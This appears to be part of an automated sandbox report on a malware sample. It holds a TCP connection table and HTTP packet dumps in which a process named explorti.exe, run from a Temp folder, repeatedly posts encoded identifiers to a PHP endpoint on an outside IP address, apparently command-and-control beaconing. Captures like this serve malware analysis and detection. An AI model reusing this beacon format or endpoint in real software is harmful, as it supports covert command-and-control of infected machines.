                      Jun 28, 2024 21:19:47.314749956 CEST804999877.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:47.317390919 CEST4999880192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:47.425312996 CEST4999980192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:47.425314903 CEST4999880192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:47.431375980 CEST804999977.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:47.431863070 CEST804999877.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:47.431962967 CEST4999980192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:47.431968927 CEST4999880192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:47.432276964 CEST4999980192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:47.437654018 CEST804999977.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:48.140129089 CEST804999977.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:48.140192986 CEST4999980192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:48.147102118 CEST4999980192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:48.147413969 CEST5000080192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:48.152534008 CEST804999977.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:48.152571917 CEST805000077.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:48.152597904 CEST4999980192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:48.152637005 CEST5000080192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:48.153100967 CEST5000080192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:48.157923937 CEST805000077.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:48.854736090 CEST805000077.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:48.854836941 CEST5000080192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:48.971226931 CEST5000080192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:48.973335028 CEST5000180192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:48.976890087 CEST805000077.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:48.977617025 CEST5000080192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:48.978271961 CEST805000177.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:48.981475115 CEST5000180192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:48.981679916 CEST5000180192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:48.986526966 CEST805000177.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:49.710212946 CEST805000177.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:49.713399887 CEST5000180192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:49.717315912 CEST5000180192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:49.717315912 CEST5000280192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:49.722294092 CEST805000277.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:49.722887039 CEST805000177.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:49.723001957 CEST5000180192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:49.723001957 CEST5000280192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:49.723189116 CEST5000280192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:49.727998018 CEST805000277.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:50.564269066 CEST805000277.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:50.564342022 CEST5000280192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:50.675066948 CEST5000280192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:50.675466061 CEST5000380192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:50.680392027 CEST805000377.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:50.680457115 CEST5000380192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:50.680706024 CEST5000380192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:50.681346893 CEST805000277.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:50.681401968 CEST5000280192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:50.685595989 CEST805000377.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:51.400830030 CEST805000377.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:51.403717995 CEST5000380192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:51.406434059 CEST5000480192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:51.406450033 CEST5000380192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:51.411562920 CEST805000477.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:51.411977053 CEST805000377.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:51.412055969 CEST5000480192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:51.412106991 CEST5000380192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:51.412281990 CEST5000480192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:51.417701960 CEST805000477.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:52.125287056 CEST805000477.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:52.125360012 CEST5000480192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:52.237076998 CEST5000480192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:52.237359047 CEST5000580192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:52.242310047 CEST805000577.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:52.242374897 CEST805000477.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:52.242384911 CEST5000580192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:52.242423058 CEST5000480192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:52.242679119 CEST5000580192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:52.247503996 CEST805000577.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:52.952470064 CEST805000577.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:52.957359076 CEST5000580192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:52.960310936 CEST5000580192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:52.960374117 CEST5000680192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:52.966463089 CEST805000677.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:52.966478109 CEST805000577.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:52.966568947 CEST5000580192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:52.966655970 CEST5000680192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:52.966989994 CEST5000680192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:52.972364902 CEST805000677.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:53.775183916 CEST805000677.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:53.775379896 CEST5000680192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:53.893793106 CEST5000680192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:53.894155979 CEST5000780192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:53.912513018 CEST805000777.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:53.912581921 CEST5000780192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:53.912924051 CEST5000780192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:53.913388968 CEST805000677.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:53.913440943 CEST5000680192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:53.924926043 CEST805000777.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:54.851656914 CEST805000777.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:54.851718903 CEST5000780192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:54.852272034 CEST805000777.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:54.852319956 CEST5000780192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:54.855281115 CEST5000780192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:54.855644941 CEST5000880192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:54.860479116 CEST805000877.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:54.860554934 CEST5000880192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:54.860601902 CEST805000777.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:54.860650063 CEST5000780192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:54.860842943 CEST5000880192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:54.865592003 CEST805000877.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:55.568044901 CEST805000877.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:55.569381952 CEST5000880192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:55.674308062 CEST5000880192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:55.674313068 CEST5000980192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:55.679326057 CEST805000977.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:55.679569960 CEST805000877.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:55.681364059 CEST5000880192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:55.681370974 CEST5000980192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:55.681519032 CEST5000980192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:55.686410904 CEST805000977.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:56.447029114 CEST805000977.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:56.447107077 CEST5000980192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:56.450854063 CEST5000980192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:56.451282978 CEST5001080192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:56.456123114 CEST805000977.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:56.456161022 CEST805001077.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:56.456185102 CEST5000980192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:56.456248045 CEST5001080192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:56.456468105 CEST5001080192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:56.463036060 CEST805001077.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:57.161283970 CEST805001077.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:57.161611080 CEST5001080192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:57.267784119 CEST5001180192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:57.267819881 CEST5001080192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:57.272696972 CEST805001177.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:57.272821903 CEST5001180192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:57.273030996 CEST5001180192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:57.273200989 CEST805001077.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:57.273317099 CEST5001080192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:57.277898073 CEST805001177.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:58.164243937 CEST805001177.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:58.164309025 CEST5001180192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:58.168087006 CEST5001180192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:58.168540955 CEST5001280192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:58.178308964 CEST805001277.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:58.178375959 CEST5001280192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:58.178599119 CEST5001280192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:58.183516979 CEST805001177.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:58.183576107 CEST5001180192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:58.183852911 CEST805001277.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:58.885529995 CEST805001277.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:58.885663033 CEST5001280192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:59.002641916 CEST5001380192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:59.002656937 CEST5001280192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:59.007615089 CEST805001377.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:59.008379936 CEST805001277.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:59.008502007 CEST5001280192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:59.008510113 CEST5001380192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:59.008723974 CEST5001380192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:59.013483047 CEST805001377.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:59.699918985 CEST805001377.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:59.704068899 CEST5001380192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:59.704070091 CEST5001380192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:59.705327988 CEST5001480192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:59.709619999 CEST805001377.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:59.717323065 CEST5001380192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:59.717422962 CEST805001477.91.77.82192.168.2.4
                      Jun 28, 2024 21:19:59.721704006 CEST5001480192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:59.721704006 CEST5001480192.168.2.477.91.77.82
                      Jun 28, 2024 21:19:59.726748943 CEST805001477.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:00.421603918 CEST805001477.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:00.421675920 CEST5001480192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:00.538475037 CEST5001480192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:00.538690090 CEST5001580192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:00.543622017 CEST805001577.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:00.543690920 CEST5001580192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:00.544245958 CEST5001580192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:00.547751904 CEST805001477.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:00.547874928 CEST5001480192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:00.549336910 CEST805001577.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:01.446198940 CEST805001577.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:01.446418047 CEST5001580192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:01.449362040 CEST5001580192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:01.451507092 CEST5001680192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:01.454766035 CEST805001577.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:01.454857111 CEST5001580192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:01.456552029 CEST805001677.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:01.456695080 CEST5001680192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:01.457072973 CEST5001680192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:01.461889982 CEST805001677.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:02.651179075 CEST805001677.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:02.651298046 CEST5001680192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:02.651534081 CEST805001677.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:02.651601076 CEST5001680192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:02.651985884 CEST805001677.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:02.652090073 CEST5001680192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:02.770656109 CEST5001680192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:02.770967007 CEST5001780192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:02.775846004 CEST805001777.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:02.775954008 CEST5001780192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:02.776160955 CEST805001677.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:02.776217937 CEST5001680192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:02.776469946 CEST5001780192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:02.781430960 CEST805001777.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:03.497170925 CEST805001777.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:03.497294903 CEST5001780192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:03.500083923 CEST5001780192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:03.500426054 CEST5001880192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:03.505219936 CEST805001877.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:03.505311012 CEST5001880192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:03.505438089 CEST805001777.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:03.505489111 CEST5001780192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:03.505587101 CEST5001880192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:03.510363102 CEST805001877.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:04.514870882 CEST805001877.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:04.515727043 CEST5001880192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:04.627321005 CEST5001880192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:04.627573967 CEST5001980192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:04.632703066 CEST805001877.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:04.632786036 CEST805001977.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:04.632817984 CEST5001880192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:04.633057117 CEST5001980192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:04.635297060 CEST5001980192.168.2.477.91.77.82
                      Jun 28, 2024 21:20:04.640206099 CEST805001977.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:05.377438068 CEST805001977.91.77.82192.168.2.4
                      Jun 28, 2024 21:20:05.377506971 CEST5001980192.168.2.477.91.77.82

                      HTTP Request Dependency Graph

                      • 77.91.77.82

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.44973177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:04.206733942 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:04.937787056 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:04.948643923 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:05.178328037 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.44973277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:05.287019014 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:05.993367910 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:05.994713068 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:06.217600107 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.44973377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:06.333981037 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:07.044295073 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:07.045072079 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:07.273659945 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.44973477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:07.380860090 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:08.100631952 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:08.101411104 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:08.360853910 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.44973577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:08.474921942 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:09.183913946 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:09.184880972 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
